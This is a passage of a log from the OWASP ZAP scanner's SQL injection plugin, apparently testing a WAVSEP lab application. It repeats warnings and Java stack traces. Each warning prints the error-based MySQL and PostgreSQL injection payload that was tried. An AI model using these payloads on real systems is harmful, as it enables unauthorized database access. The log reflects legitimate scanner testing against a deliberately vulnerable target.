172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND (SELECT 4144 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4144=4144,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3857=3857 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679220 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND (SELECT 6270 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6270=6270,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('AEQu'='AEQu] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND (SELECT 6270 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6270=6270,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('AEQu'='AEQu at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679221 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT 9086 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9086=9086,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT 9086 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9086=9086,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679222 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND (SELECT 9037 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9037=9037,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RWVg'='RWVg] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND (SELECT 9037 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9037=9037,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RWVg'='RWVg at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679222 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND (SELECT 8856 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8856=8856,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('zKPg'='zKPg] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND (SELECT 8856 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8856=8856,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('zKPg'='zKPg at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679223 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND (SELECT 4822 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4822=4822,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND (SELECT 4822 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4822=4822,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679223 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND (SELECT 1021 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1021=1021,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WSED'='WSED] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND (SELECT 1021 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1021=1021,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WSED'='WSED at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679225 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT 1625 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1625=1625,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- PVKo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT 1625 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1625=1625,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- PVKo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679225 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND (SELECT 4117 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4117=4117,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND (SELECT 4117 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4117=4117,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679226 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 7548=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7548=7548) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (4270=4270] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 7548=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7548=7548) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (4270=4270 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679227 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT 3705 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3705=3705,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- sYOe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT 3705 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3705=3705,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- sYOe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679227 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 6918=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6918=6918) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 6918=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6918=6918) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679228 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 8490=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8490=8490) 